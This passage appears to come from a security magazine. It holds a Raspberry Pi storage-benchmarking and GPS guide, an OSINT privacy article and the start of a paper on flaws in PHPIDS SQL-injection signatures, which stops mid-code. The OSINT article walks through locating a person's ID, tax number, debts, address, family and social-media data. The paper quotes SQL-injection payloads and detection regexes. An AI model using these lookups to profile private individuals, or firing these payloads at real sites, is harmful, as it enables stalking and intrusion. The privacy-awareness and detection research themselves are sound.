However, if a different storage medium is used, for example, a USB memory stick or external hard drive, the path for
that device can be used in place of the micro SD card.
hdparm - hdparm, named using the abbreviation of "hard disk parameter", is a command line program for Linux that
can, amongst many functions, gather performance statistics. Other functionality of hdparm is the ability to set drive
caches, sleep mode, power management, acoustic management, and DMA settings. There is a danger inherent with
this, insofar as, with certain settings, it can crash the system, render the storage inaccessible, and cause complete data
loss! ONLY use hdparm settings that are fully understood!
To use hdparm individually, assuming the PiRamble script has NOT been run, first update and upgrade from the repositories
if required!
Install hdparm:
Run hdparm:
The following results show the tested micro SD card has 42.69 MB/sec, which is within limits:
dd - dd is a standard Linux and Unix command that has a primary function to copy and convert files. Typically, it is
installed by default and with Raspbian there is no requirement to install dd. For this guide, dd will be used to transfer
from /dev/zero to a file in the home directory. The file will then be deleted.
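For readers who prefer to script this test, the idea behind the dd run (write zeros to a file, force them to storage, time it, delete the file) can be sketched in Python as follows. This is not the dd command itself and its figures will not match dd exactly; the function name, the 64 MB size and the 1 MB block size are assumptions for illustration.

```python
import os
import tempfile
import time


def sequential_write_mb_per_s(directory: str, total_mb: int = 64,
                              block_kb: int = 1024) -> float:
    """Write zero-filled blocks to a temporary file, sync, delete it, return MB/s."""
    block = bytes(block_kb * 1024)           # one block of zero bytes
    blocks = (total_mb * 1024) // block_kb   # number of blocks to write
    fd, path = tempfile.mkstemp(dir=directory)
    try:
        start = time.perf_counter()
        with os.fdopen(fd, "wb") as handle:
            for _ in range(blocks):
                handle.write(block)
            handle.flush()
            os.fsync(handle.fileno())  # force the data to the storage device
        elapsed = time.perf_counter() - start
    finally:
        os.remove(path)  # the test file is deleted afterwards
    return (blocks * len(block)) / elapsed / 1_000_000
```

Calling sequential_write_mb_per_s(os.path.expanduser("~")) tests the storage that holds the home directory; pass a directory on a USB stick or external drive to test that device instead.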
IOzone - IOzone ( http://www.iozone.org/ ) is a very popular filesystem benchmarking tool. In fact, with v3.487, there
are 62 supported platforms. IOzone has the capability to carry out an extensive filesystem analysis of a given computer
system. The benchmarking tests file I/O performance for the following operations; read, write, re-read, re-write, read
backwards, read strided, fread, fwrite, random read, pread, mmap, aio_read, aio_write. Additionally, IOzone can be
run to output in a format that is compatible with popular spreadsheet applications so that in depth analysis of
filesystem performance can be readily carried out!
This guide will use the latest stable source code. As of September 2019, the latest version of IOzone is v3.487. The
PiRamble script uses v3.43.
Download the v3.487 source code for IOzone to the home sub directory on the Raspberry Pi:
cd ~
wget http://www.iozone.org/src/current/iozone3_487.tar
cd iozone3_487/src/current/
To establish the correct compile option, use make to show the list of supported platforms, this step is optional:
The binaries for IOzone are now in this sub-directory, IOzone can be run from this location or copied to a filesystem
location if testing a different storage device, for example, a USB memory stick.
To use IOzone to evaluate the SD card performance, use the following command line options:
./iozone -e -I -a -s 100M -r 4k -i 0 -i 1 -i 2
The above screenshot shows the random read (9591 KB/s, or 9.591 MB/s) and random write (4472 KB/s, or 4.472 MB/s) speeds of the
micro SD card.
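Because a single run is only a snapshot, it can help to repeat the test and summarise the results. The Python sketch below converts IOzone figures from KB/s to MB/s (dividing by 1000, as in the figures above) and reports the minimum, average and peak. Apart from 9591, the run values in the example are hypothetical placeholders, not measured results.

```python
from statistics import mean


def kb_to_mb_per_s(kb_per_s: float) -> float:
    """Convert a throughput figure from KB/s to MB/s."""
    return kb_per_s / 1000


def summarise_runs(kb_per_s_values):
    """Return minimum, average and peak throughput in MB/s for repeated runs."""
    mb_values = [kb_to_mb_per_s(value) for value in kb_per_s_values]
    return {"min": min(mb_values), "avg": mean(mb_values), "peak": max(mb_values)}


if __name__ == "__main__":
    # 9591 is the random read figure quoted above; the other two are hypothetical
    random_read_runs = [9591, 9410, 9702]
    print(summarise_runs(random_read_runs))
```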
The AWUS036ACH is a high powered Wi-Fi USB adapter. When the adapter case is opened, there is a small switch
(see the photo, with the switch highlighted in red). This switch controls the power and sensitivity. Normal power is
under 20dBm, for high power, see the table below.
Antenna specification
The recommended antennas for this unit are the excellent Printed Circuit Board (PCB) antennas designed and
manufactured by Kent Britain. These antennas are very efficient at 2.4GHz and 5GHz (the frequencies of interest),
omni-directional, small and very discreet!
The datasheet provides full details for connectivity, directional sensitivity and performance.
The GPS module needs to be connected “electrically” to the Raspberry Pi. This is a straightforward process;
how the GPS module is “packaged” determines whether it will require any soldering.
The complete Raspbian configuration and software installation is detailed above, in summary it consists of:
• Enabling the serial interface on the Raspberry Pi for the GPS module to use
• Configuring gpsd
Only four connections are required from the GPS module to the Raspberry Pi:
• GND/ground – Connect to GPIO header pin 6, 9 or 14. These pins are specified due to their close proximity to
the TX and RX pins. Other ground pins are available at pins 20, 25, 30, 34 and 39. “Electrically” they are all
equivalent
• TXD/Transmit data - Connect to GPIO header pin 10, this is the RXD/receive data pin on the Raspberry Pi; the
connection is “crossed over”, i.e. TXD – RXD
• RXD/Receive data - Connect to GPIO header pin 8, this is the TXD/transmit data pin on the Raspberry Pi; the
connection is “crossed over”, i.e. RXD – TXD
It is recommended that an external active antenna is used. The NEO-6M (the GPS module used in this guide) has a
U.FL connection, whereas the majority of external active antennas use an SMA connector; therefore a U.FL to SMA
adapter/pigtail is used.
N.B. The U.FL connector is very small, 3.0 mm by 3.1 mm and 2.5 mm height. Not only is the
connector very fragile and easily broken, the U.FL connector is not rated for numerous insert/remove
connections. USE EXTREME CARE WITH THIS!
GPS profiling
GPS profiling is a very useful exercise to carry out, for both diagnostics and performance analysis, to give a better
understanding of the “GPS chain”. The “GPS chain” comprises all components used: specifically, the GPS module, external
antenna (if used), and associated cables and connectors. As an example, a powered GPS antenna, an “active antenna”, is
commonly used. However, if the cable is very long and not of high quality, the voltage sent from the
GPS unit, typically 3.3 V, is not necessarily the voltage at the active element of the GPS antenna, which directly
affects the gain of the active antenna. Furthermore, the concept behind active antennas is to have RF amplification as
close as possible to the antenna, increasing the overall Signal to Noise Ratio (SNR). Again, if the cables are of poor
quality and/or very long, the benefit of increased SNR may be reduced and, in extreme circumstances, noise
and distortion may be introduced to the GPS signal, reducing the effectiveness of the overall “GPS chain”.
To carry out GPS profiling, the following are the main variables that will impact the effectiveness of the GPS profiling:
• The antenna of the GPS module must have a clear view of the sky
• If the antenna has a cable, ensure that the cable is of high quality and as short as possible
• gpsprof – This is installed as part of the python-gps package, which is installed as a dependency with
gpsclients. Whilst a lot of the “online” information for gpsprof is inaccurate or outdated, a good resource is the
man page that can be found at http://manpages.ubuntu.com/manpages/bionic/man1/gpsprof.1.html.
• gnuplot – This has not been installed so far in this guide, so will need to be installed. The gnuplot www page is
http://www.gnuplot.info/.
N.B. If using a u-blox GPS module, which this guide does, there is Windows-based software
provided by u-blox, at no cost, for GNSS evaluation. This software is called u-center and is available
from https://www.u-blox.com/en/product/u-center .
u-center is a very comprehensive suite of software, however, the GPS module has to be connected via
a USB to serial adapter, therefore the GPS module and complete “GPS chain” is NOT evaluated, i.e.
NOT using gpsd and NOT tested “in situ”.
u-center operation is considered “out of scope” for this guide and will not be detailed in this article,
however, for readers who use Windows, u-center is a worthy software application to be familiar with.
The profiling method can be run on all of the versions of Raspbian specified in this guide, however, for Raspbian Lite,
as there is no desktop, an image is generated that can then be transferred.
Install gnuplot:
How Exposed Are We On the Internet?
Carlos Loyo
Emiliano Piscitelli
Carlos Loyo
Computing.
Contact: [email protected]
ABOUT THE AUTHOR
Emiliano Piscitelli
Contact: [email protected]
How Exposed Are We On the Internet?
There is no question that the Internet has become a basic need for both people and companies, one that can
on many occasions be equated with services such as electricity, water or gas. Examples of this are the companies that
cannot carry out their tasks normally, or the flood of comments on social networks, when there are
connection problems. Currently, many of us use several services on the Internet, and in some of them it is
very likely that we upload information such as places visited, personal photos, comments related to religious or
political affiliations, tastes and hobbies, among others. This information can be exploited by third parties (people
or companies) in order to target advertising, investigate our profile and that of our environment, or
spread propaganda, among other uses.
OBJECTIVE?
Before moving forward, it is very important to know the concept of OSINT (Open Source Intelligence). This refers to
obtaining information from open sources (publicly accessible without requiring prior authorization) that will be
analyzed and can then be used for different purposes such as:
• Public safety
• Threat monitoring
• Corporate research
• Executive Protection
• Business reputation
• Fraud analysis
• Financial security
• Competitive intelligence
• Marketing
And some of the sources from which this information is commonly obtained are:
• Government Information
Today there are different techniques and tools that are used both by government agencies, in pursuit of investigations
and crime prevention, and by private companies with other objectives.
Whether the target is a person or a company, the aim is to obtain as much information as possible about it.
As an example, here is a list that will give you an idea of the type and depth of information that can be obtained about a
person:
• Habits
• Tastes
• Religion
• Sexual orientation
• Political leaning
• Workplace
• Sports
• Usual routes
• Places visited
• Travels
• Vehicles
• Technology used
As you can see, this type of information is sensitive and carries a latent danger, since it could be used for
criminal purposes.
• How much information about me, my family and my friends is publicly available?
Since there is no direct way to access all Internet sites, it is difficult to know 100% of the public information that can
help answer these questions, but with the procedures that we will detail below, we can get a good approximation. For this
we will rely on the workflows of Michael Bazzell (an international reference in OSINT), based on searches by real name,
alias, mail, telephone and domain.
Real Name
A simple way to start finding out what data may be published about a user is to begin with the user's real name: first name
and surname (See Image 1). With a name and surname as the search input, you can perform the following searches:
● Identity Document
● Phone number
● Family data
○ Network Validation
Image 1 Search flow starting from a person's first and last name
a) Identity Document:
To identify a person's Identity Document, you can search using engines such as Google, Bing and Yandex. Normally,
people only use Google because of its popularity, but a good analyst cannot be limited to a single search engine.
It is well known that Google does not index the entire Internet, so when we want to find as much as possible of the
information related to companies or people, it is important to also use other engines, such as Bing
(https://www.bing.com/) or Yandex (https://yandex.com/), since they have other operators and also index
information in different ways. Therefore, as a recommendation, enter the real name in at least two search
engines and subsequently validate the results. In the case of the Identity Document, operators can be combined as follows:
“person_name” dni
Note: In Argentina the identity document is called “Documento Nacional de Identidad” (National Identity
Document) or DNI. Another document could be the "cédula de identidad" (identity card).
As you will see, depending on the region, searches can combine words and domains. Likewise,
depending on the location, and with the aim of comparing results, other domains can be used, for example
Google Mexico (www.google.com.mx) if the person is related to that country.
In conclusion, the possible searches are very broad and limited only by the imagination of the analyst.
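To make the “same query, several engines” recommendation concrete, the following Python sketch builds the search URLs for one quoted name plus a keyword, optionally restricted to a single site. The function name and the URL templates are assumptions for illustration (the templates reflect the commonly used query parameters of each engine), and person_name is a placeholder exactly as in the operator example above.

```python
from urllib.parse import quote_plus

# Assumed URL templates for each engine's public search page
SEARCH_URLS = {
    "google": "https://www.google.com/search?q={}",
    "bing": "https://www.bing.com/search?q={}",
    "yandex": "https://yandex.com/search/?text={}",
}


def build_queries(person_name: str, keyword: str, site: str = "") -> dict:
    """Return one search URL per engine for an exact-name query plus a keyword."""
    query = f'"{person_name}" {keyword}'
    if site:
        # The site: operator restricts results to a single domain
        query = f"site:{site} {query}"
    return {engine: url.format(quote_plus(query))
            for engine, url in SEARCH_URLS.items()}


if __name__ == "__main__":
    for engine, url in build_queries("person_name", "dni").items():
        print(engine, url)
```

Opening the resulting URLs side by side makes it easier to compare what each engine has indexed before validating the results.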
b) Fiscal Document:
If you want to identify the tax document number (in the case of Argentina, it is called CUIL or CUIT depending on the
type of tax record), you can combine search engines as in the previous example:
“person_name” “CUIL”
In the case of Argentina, there are search sites such as: https://www.dateas.com/es, https://www.nosis.com/es or
http://www.buscardatos.com. If you do not want to perform the search on the website itself, it can be done using
search engines combined with the different operators. For example:
c) Public Debts:
To analyze debts related to a person through public sources, the portals legally permitted by the government of the
relevant country must be identified before starting the data collection. In the case of Argentina, outstanding payments can
be checked by licence plate number (known locally as “patente” or “dominio”) or by identity document. Other data that can be
obtained publicly relates to the person's credit situation: loans, returned checks and credit card spending.
To identify vehicle tax (“patente”) debts and traffic infringements, you can consult sites like:
➡ http://www3.arba.gov.ar/AvisoDeudas/?imp=1
➡ https://lb.agip.gob.ar/ConsultaPat/
➡ https://consultainfracciones.seguridadvial.gob.ar/consulta/
➡ http://www.buenosaires.gob.ar/consulta-de-infracciones
➡ https://www.infraccionesba.net/
(These are examples for the Argentina region, but can be applied in other countries/cities depending on local
services.)
If we want to know the credit situation from an identity document related to a person, a site to consult is:
➡ http://www.bcra.gob.ar/BCRAyVos/Situacion_Crediticia.asp
d) Possible Address:
If you want to check whether a person's home, work or summer house address can be obtained from their name,
you can combine search operators like the ones we saw earlier with the word “address” or any related
term. Another way is to check lookup sites; in the case of Argentina, one example is:
➡ https://www.telexplorer.com.ar (on this portal, you can obtain a person's address from their name
and likely city)
e) Telephone Number:
If you want to identify phone numbers from a person's name, you can search in the white or yellow pages; an example
of this could be:
As in previous cases, we can also combine search operators in different search engines.
f) Family data:
Public information about a person's family can be obtained through their social networks (as we will
see later) or through dedicated reference portals, especially those related to family trees. For example:
➡ https://www.genealogy.com/
➡ https://www.familysearch.org/hr/search/
➡ https://www.ancestry.com/search/
Note: Always remember, for indirect searches, establish search operators and look at the results in cache.
g) Social Networks:
The first thing we are going to use are the so-called "people finders"; an example of this is the website:
➡ https://pipl.com
Here the real name of the person must be entered and, as an additional filter, the location of the person; possible
social and professional network profiles and publications are then returned.
➡ https://www.fastpeoplesearch.com
➡ https://www.spokeo.com
If you want to see data published on social networks “without being friends”, start from a browser that does
not have a user logged in: enter the real name of the person in the search bar of the social network site and,
once the profile is located, check whether information such as photos, friends, places, comments or public groups
is visible to outsiders. On the other hand, if you wish to see the data referenced by the same user or by
satellite users, you must first obtain the identifier (“ID”) of the account on the social network to be
analyzed.
To explain this procedure we will rely on the most used social network, Facebook:
• First of all, we must obtain the URL of the account, which is composed of
https://www.facebook.com/[username]
• Afterward, the translation of the URL to the ID must be done through portals such as https://lookup-id.com.
• Finally, in a browser that does not have an active Facebook login, in https://stalkscan.com/, you can check
your own account, and with https://sowdust.github.io/fb-search/ you can analyze the ID obtained in the
previous step.
For analysis of Facebook (besides Michael Bazzell’s web portal), the results can be validated on sites like:
➡ http://www.uk-osint.net/facebook.html
Image 2: StalkFace is a web portal that allows you to analyze and filter data from an account to be monitored on Facebook
The procedure explained above is similar for the social network Twitter, where initially we must obtain the URL of the
account and the ID. If you want to analyze the account information through websites, you can use the following sites:
➡ http://www.twimemachine.com/user/username
From the latter, all publications can be viewed in a flat format, similar to a txt file.
In the case of Instagram, you can search by tags through https://www.instagram.com/explore/tags/[name], where
you will get the photos that reference the tag, which makes it possible to locate references to satellite users.
Alias
If you want to check how much public information is available on the Internet under a nickname or alias (See
Image 4), you can use the nickname as the search entry and perform the following searches:
One way to check whether an alias (“nick”) is in use on different social networks is to validate it on sites such as:
➡ https://pipl.com/
➡ https://namechk.com/ (See Image 5) (on this site, the alias of the account is entered in the search field, and the
social networks where that alias is active are shown in gray at the bottom of the page).
➡ https://knowem.com/
Image 5: Analysis with the Namechk portal to identify social networks from an alias
If we know an alias, a simple way to validate it is to combine it with common mail domains in the form alias@domain
(for example gmail, hotmail, etc.). Once the email is located, you can search for possible leaks at
https://haveibeenpwned.com. Beyond the possible leaks, this search allows us to identify social networks linked to an
email.
In the case of search engines, different combinations of operators can be used (it is important to validate the
results in more than one engine), as well as metasearch engines that process results from traditional search engines.
Some examples are:
➡ https://searx.me/ (This metasearch engine allows you to export the results in json and csv format, obtaining
its results from Google, Bing and Wikipedia).
➡ http://yippy.com/ (using Yippy we can see how the results are ordered in a hierarchical folder structure).
Analysis tools
We often need to work with high volumes of information in little time, so obtaining results through a manual
procedure becomes unproductive and cumbersome. In these cases we can rely on tools that help us carry out large
searches across open sources and automate different tasks.
• Maltego (to expand searches in social networks, it is recommended to implement the SocialLinks API
https://mtg-bi.com) (See Image 6)
• Apache NiFi
• Tinfoleak
• Shodan
Image 6: Use of the SocialLinks transform for analysis of multiple Facebook accounts through Maltego
So far we have seen that a lot of information about us is public. Part of that exposure does not depend directly on us,
but another part does, so below we present some tips to protect our privacy and thus raise the security
threshold:
Exposure in social networks: When we discuss privacy in social networks we like to make an analogy with the
physical world and give two very simple tips:
1. Never write something on a social network that you would not say in front of a microphone in the presence
of thousands of people you do not know.
2. Never upload a photo or video to a social network that you would not exhibit on a giant screen inside a
football stadium.
Metadata: It is very common to share information with our friends, co-workers or clients. While this action (with due
care) does not represent a vulnerability in itself, the data that is generated and associated with most of the documents
we create (.doc, .xls, .ppt, .pdf, .jpg, .png, etc.) may be used to gather information that we do not want to provide.
This data is known as metadata (data about the data) and can be used against us. If it is not controlled correctly,
it could represent an important information leak, both for our company and for our private life.
To avoid this, we can take different actions. Among them, we can configure the tool we use (as long as it has this
option) so that it does not save the metadata. We can also use tools for the analysis and deletion of metadata, such as
Exiftool (http://sourceforge.net/projects/exiftool) or external services that control and help us keep our files without
metadata, such as Metashield Protector
(https://www.elevenpaths.com/es/tecnologia/metashield/metashield-clean-up-online/index.html).
Geolocation: Nowadays, it is very common for both applications and websites to suggest that we activate our geolocation
in order to obtain “a better experience”. The problem arises when this geolocation is exposed and can be accessed by
any user. For example, on Twitter it is very easy to obtain the exact location of each tweet that a user generates (as
long as the user has this functionality activated). It may seem harmless at first glance, but what happens if, by
analyzing these positions, someone can deduce the address of a person's house? Surely we will not want that “better
experience” and will immediately deactivate the geolocation, right?
Privacy settings: It is very important to check our privacy settings in each and every one of the applications and
services we use. For example, WhatsApp lets us configure who can see (everyone, our contacts or nobody) our status,
our photo and our last connection time (by default everyone can see this information). At first sight, this does not
seem to threaten our privacy, but what if someone used tools that constantly monitor all this information? Worse, the
times when we were not online could be analyzed to infer when we are sleeping, and then our privacy would be
jeopardized.
Online services registration: Nowadays, it is very common for any online service to request our email address in order
to register. Beyond entrusting our information to the service in question, we add the possibility of a security
breach: if the service suffers an attack (as many already have), our data would be exposed. If we add that many users
use the same password for all (or almost all) their services, the criticality is even greater. That is why we
recommend having an additional email account whose name has no direct relationship with us (ex: [email protected]) and
using it to register for different services.
Registration in public events: Some time ago, we had to carry out a security assessment of a company. When we
started with one of the first stages (information gathering), we were surprised to find, almost immediately, that the
corporate mail belonging to one of the employees had been used (by the same employee) to register for a prize draw
that was being held in a supermarket. Next to this mail were data such as: name and surname, ID, address and
telephone (landline and cell phone). This information was publicly displayed on the (not very careful) site of the
marketing company that had run the draw. Incidentally, obtaining it cost us no more than an advanced Google
search.
It is advisable not to register for this type of promotion, but if you want to do it, avoid entering sensitive
data, use an email address like the one described in the previous point and never, ever, use your work email.
Participation in forums: In some of our pentests, it was very easy to obtain information thanks to public forums.
In them we were able to obtain data on the targets such as: operating systems, services, versions, users, security
policies and many more details. At this point you may be asking: how could you get so much information in a public
forum? The answer is simple: technical users of the companies asked very detailed and specific questions about
implementation problems, used their corporate mail to do so and, in many cases, even signed with their name, surname,
position and telephone number.
There is no doubt that participating in forums and being able to help or be helped is very good. The problem arises
when much more information is left there than just questions and answers.
Search yourself periodically: As we all know, the information found on the net grows every second, which is
why a very good practice is to search for ourselves periodically. That way we get a general overview of
how exposed we are and, if necessary, can act immediately on any information that could threaten
our privacy.
To perform this task, you can use the step-by-step procedure discussed above (Obtaining and analyzing information) as
a base and gradually extend the searches and the analysis of the information with other sources and tools.
CONCLUSIONS
As we have seen throughout this article, there are many sources from which information about us can be obtained. In
many cases it can threaten our privacy, and in the wrong hands it can become very dangerous. It is true that we are not
always able to control what is published and what is not (government sites, bank details, etc.), but in other cases we
can, and that is where we must focus. It is very important to know that this information exists, and only by raising
our own awareness and that of our environment can we take care of our privacy and that of
those around us.
LINKS OF INTEREST:
• OSINT LATAM Group: https://www.osintlatamgroup.com
• OSINT Framework: http://osintframework.com
• Tinfoleak: https://tinfoleak.com
• Shodan: https://www.shodan.io/
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
Nancy Agarwal
Signature-based Intrusion Detection Systems (SIDS) provide a promising solution to the problem of web application
security. However, the performance of such a system relies heavily on the quality of the signatures designed to detect
attacks. A weak signature set may considerably increase the false alarm rate, making it impractical to
deploy the system. The objective of the paper is to identify the flaws in the signature structure that reduce
the efficiency of the detection system. The article targets SQL injection signatures in particular. First, we discuss
some essential concepts of the attack domain on which the developer should focus prior to designing the signatures.
Afterwards, we conduct a case study on the well-known PHPIDS tool to analyze the quality of its
SQL signatures. Based on the analysis, we identify various flaws in the design practice that yield inefficient
signatures. We divide the weak signatures into six categories, namely incomplete, irrelevant, semi-relevant,
susceptible, redundant and inconsistent signatures. Moreover, we quantify these weaknesses and define them
mathematically in terms of set theory. To the best of our knowledge, some of the signature design issues we identify
are novel. The paper will help signature developers understand what level of expertise is required for
devising a quality signature set and how a small oversight may lead to deterioration in the performance of SIDS.
Furthermore, a security expert may evaluate a detector against the identified flaws by conducting structural analysis
on its signature set.
1. Introduction
The issue of securing a web application from the continuously growing malicious activities is in a state of flux1. The
increasing dependency on web applications for everyday activities, such as online banking, shopping, social
networking, etc., makes these applications a lucrative asset for the attackers. According to the latest security report
(the year 2017)2, there is a 35% increase in the number of web application attacks from the previous year. One more
study3 reports that 60% of cyber attacks either target the web applications or use them as a vector in the attack.
Intrusion Detection System (IDS) is one of the security solutions employed to safeguard web applications from cyber
attacks (Depren et al. 2005). The main objective of these systems is to recognize a suspicious client-request to the web
application. Anomaly-based detection and signature-based detection are the two common approaches used to build
these systems. The Anomaly-based IDS (AIDS) is first trained to learn the benign usage behaviour of the application
and then used to classify any deviation from the trained behaviour as an attempt to attack (Kruegel et al. 2003),
whereas the Signature-based IDS (SIDS) is provided with the patterns of known attacks in order to identify suspicious
activities (Almgren et al. 2000). The advantage of signature-based systems over AIDS is that they generate
comparatively fewer false positives; on the downside, SIDS cannot detect unknown or
modified attacks. The performance of signature-based systems is strongly affected by the quality of the signature
set (Kim et al. 2004; Yegneswaran et al. 2005). A weak signature set may result in a significantly high number of
false alerts, which would make the IDS infeasible to use.
Since these signatures are mostly created by a security expert, their quality depends strongly on the extent of the
expert's knowledge of the attack domain and on how precisely the patterns of the attacks are captured and
implemented. Both incomplete knowledge of the attack domain and flaws in implementing the detection rules lead to
a poor quality signature set, which in turn reduces the efficiency of SIDS.
Attackers have a list of vulnerabilities with which to exploit a website (Wichers 2013), and the domain of the attack
vectors varies significantly with the class of vulnerability. For instance, attack vectors targeting SQL
vulnerabilities make use of SQL elements and related operations (Morgan 2006), whereas XSS-based attack vectors mostly
comprise elements of HTML or JavaScript (Spett 2005). Attackers have a number of ways to exploit a single
vulnerability and can even create an unbounded number of mutants of an attack vector (e.g. using whitespace, special
characters or encoding techniques) to bypass an IDS. Therefore, it is necessary for a signature developer to have a
sound technical understanding of the respective vulnerability and its attack domain. However, sound knowledge of the
attack vectors is not enough to build an efficient SIDS. The defined rule set plays an equally vital role in a
successful SIDS. If the signature set is not complete or a signature pattern is not implemented correctly, the system
may allow attack vectors to penetrate the web application. There is also a common trade-off between
the sensitivity and the specificity of a signature. A generic signature can be modeled to obtain greater detection
coverage and deal with variations of attack vectors, but it might affect legitimate request traffic by mistakenly
categorizing it as an attack too often. Alternatively, several precise signatures can be modeled to handle different
forms of attack vectors and reduce the false positives, but a specific signature puts the application's security at
stake by not issuing an alert on a slightly modified attack vector.
In this article, we study the structure of the signatures designed to detect SQL injection and identify various
flaws that are made by signature developers and lead to a poor quality signature set. SQL injection (SQLi) is one of
the attack classes that exploit the input validation vulnerability to perform unauthorized operations on the database
server of the web application (Clarke-Salt 2009). However, the flaws identified in the paper are not limited to SQLi
signatures but apply universally to any signature set designed to detect intrusions. The paper first discusses the
concepts of the attack domain and the SQL technology that must be known to the developer prior to designing the
signatures. It explains the relationships that exist among SQL attack vectors and signatures and highlights various
peculiar and finer details that might be ignored by the developer while analyzing and extracting patterns from the
attack vectors. Afterwards, we conduct an experiment on the PHPIDS tool, a PHP-based Intrusion Detection
System, in order to analyze the quality of the structure of its signatures, particularly those for detecting SQLi
attacks. We created a set of 415 attack vectors with five attack vectors per signature (given in Appendix A). We used
an iMacros-based script 4 to automate the process of sending attack requests to the vulnerable web application hosted
on localhost. The quality is assessed on various parameters, including the contribution of the individual
signatures to the detector, the sensitivity and specificity of the designed signatures, and the attack vectors that
can bypass the IDS. Based on the structural analysis, we identify various signature design issues that cause a poor
signature set even when the developer has proficient knowledge of the attack domain. Moreover, we quantify the flaws
and describe them mathematically in terms of set theory.
4 https://wiki.imacros.net/Tutorials
The mathematical definitions will help the security expert assess SIDS via conducting structural analysis from various
perspectives.
The contribution of the work is three-fold: (1) We discuss the key points to be focused on while attaining the
knowledge of SQL-based attack vectors in order to formulate efficient signatures. (2) We perform a case study where
we assess the structure of the signatures of the PHPIDS. (3) We reveal a number of pitfalls in the signature design and
describe them mathematically.
The paper is structured as follows: Section 2 discusses the relevant work. Section 3 describes
the relationship between the signatures and the attack domain of SQL injection. Section 4 presents the case
study, in which an experiment is carried out to assess the quality of the signatures of the PHPIDS software. It is
followed by section 5, which describes the design issues identified while studying the structure of the PHPIDS
signatures. Finally, section 6 concludes the paper and outlines future directions.
2. Related Work
Signature-based systems have been extensively adopted as a security measure to address the cyber attacks in various
domains such as detecting intrusive activities on the cloud or network (Vaidya 2001; Roschke et al. 2009), identifying
internet worms (Tang et al. 2007), malware (Zheng et al. 2013), etc. Just like any other software, intrusion detection
systems are also associated with a number of defects and errors, therefore, they also need to be tested to ensure the
expected quality. The security experts assess these systems on various performance measures to verify their
effectiveness (Mel et al. 2003; Zanero 2007; Massicotte et al. 2012; Massicotte et al. 2015). Detection coverage is one
of the main testing parameters used to describe the capability of the system to prevent the attacks, and is also
considered as a primary goal in building an IDS. However, evaluating the detection coverage is quite a difficult task as
identifying a complete set of intrusion activities that might occur is not possible (Igure et al. 2008). In a study
(Puketza et al. 1996), the authors have tested non-functional requirements of the Network Security Monitor (NSM)
(Heberlein et al. 1990) on the basis of two more parameters, namely resource usage and resilience to stress. The
resource usage testing helps to evaluate the resources such as CPU time and memory space consumed by the IDS. If
the system is found to consume excessive resources, it might become impractical to deploy in a real environment.
Resilience testing helps to measure the ability of the system to withstand stress conditions such as excessive
workload, abundant noise, etc. IDSs also suffer from a particular problem, “blind spots”, which are the classes of
attack vectors missed by the detector. An attacker can examine the design of IDSs that are commercially
or openly available and identify possible blind spots that might help them evade these systems. In
(Vigna et al. 2004), the authors proposed a framework to automatically generate variants of attacks in order to
identify blind spots in a system, and tested the detection capabilities of two well-known network-based IDSs, namely
RealSecure (Wassom 2003) and Snort (Roesch 1999).
The existing literature has mostly used a black-box approach to examine a detection system, in which the
performance is tested against a large set of attack vectors. However, the performance of such systems depends heavily
on how efficiently the signatures are structured. Keeping this in mind, several researchers have
adopted a white-box approach and proposed techniques to perform structural analysis of IDS signatures. For
example, the constant addition of new signatures in the database over time in order to cope with new vulnerabilities
and exploiting mechanisms often results in the generation of redundant signatures in the database. In a study
(Stakhanova et al. 2010), the authors have proposed an approach based on Non-deterministic Finite Automata (NFA)
to identify such signatures and resolve the semantic inconsistencies in the rules set of the IDS. In another study
(Massicotte et al. 2011), the authors attempt to identify the overlapped signatures in the signature database of Snort
IDS. Overlapped signatures refer to the signatures triggered simultaneously on the same group of attack vectors. The
authors in this study have used automata theory and set theory to characterize the signatures and identify overlaps
respectively. In the proposed work, the structure of the signatures has been analyzed to examine various factors such
as the contribution of an individual signature in the detection coverage, specificity and sensitivity in the signatures,
etc. Moreover, based on structural analysis, we identified a few more issues in the design of signatures besides
overlapping and redundancy, which are responsible for a poor quality signature set.
It is well known that to design a quality signature set, the developer must acquire a profound knowledge of
the domain concerned. But gathering knowledge is not productive unless we are focused and know which
details are significant from the signature design point of view. SQL injection signatures relate to the
attack vectors to be detected, and attack vectors are related to the programming elements of SQL. Although there
exists a plethora of literature on SQL technology and SQL-based attacks (Clarke-Salt 2009), in this section we discuss
their concepts exclusively from the signature design point of view. Attackers mostly use unconventional ways to poison
the original SQL query in order to conduct unauthorized operations on the database. This section explains the
relationships that exist among SQL, its attack vectors and signatures, and highlights a number of peculiar points that
are important for designing the signatures. The presented knowledge will help developers gain understanding and
make them aware of fine details they might otherwise ignore. The relationships can be understood by looking into the
following concepts.
An arbitrary input will not cause a successful injection. An attack vector needs to be in a specific format in order to
produce the desired result. A number of techniques are used to exploit SQLi vulnerabilities (Depren et al. 2005;
Bau et al. 2010) and each technique is associated with its respective set of attack vectors. For instance, the
tautology-based injection technique targets the 'WHERE' clause of the query and injects code to control the result
of the conditional parameter. The attack vectors using this technique make use of Boolean operators such as OR, AND,
||, &&, ^, etc. to infect the query. Below are some examples of queries modified by the tautology-based attack vectors.
If we look closely at the two operators OR and || from the signature perspective, although these operators behave
similarly from the operational perspective, they require somewhat different regular expressions to recognize them. The
'OR' operator must be followed by certain special characters such as a space (\s) or a bracket (\(), which is not a
requirement for its symbolic counterpart '||'. If the developer fails to understand such finer details, the result may
be poor signatures. For example, the regular expression (?:(?:n?and|x?or|not|\|\||\&\&)\W+\w+) will fail
to detect the last attack vector, whereas the expression (?:(?:(\W+(n?and|x?or|not)\W+)|\|\||\&\&)\W*\w+) has the
potential to detect all three vectors. However, detecting attack vectors should not be the sole
criterion for a signature. Special care should also be taken to ensure that the signature does not categorize benign
input as malicious. For example, the regular expression (?:(?:n?and|x?or|not|\|\||\&\&)\W*\w+) is also capable of
detecting all of the attack vectors, but it raises the risk of false positives as well. The signature will put input
that contains 'or' as a substring, such as projector, actor, preorder and so on, on the suspicious list.
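The behaviour of the three expressions can be checked with a short script. This is a minimal sketch: the regular
expressions are the ones quoted above, but the labels (strict, grouped, loose) and every input string are
hypothetical, chosen only for illustration, and Python's re module stands in for the PCRE engine used by PHP.

```python
import re

# Signatures quoted from the text; the dictionary keys are labels chosen here.
SIGNATURES = {
    "strict": r"(?:(?:n?and|x?or|not|\|\||\&\&)\W+\w+)",
    "grouped": r"(?:(?:(\W+(n?and|x?or|not)\W+)|\|\||\&\&)\W*\w+)",
    "loose": r"(?:(?:n?and|x?or|not|\|\||\&\&)\W*\w+)",
}

# Hypothetical inputs: three tautology-style vectors and two benign strings.
ATTACKS = ["1 or 1=1", "1 or(1=1)", "1||1=1"]
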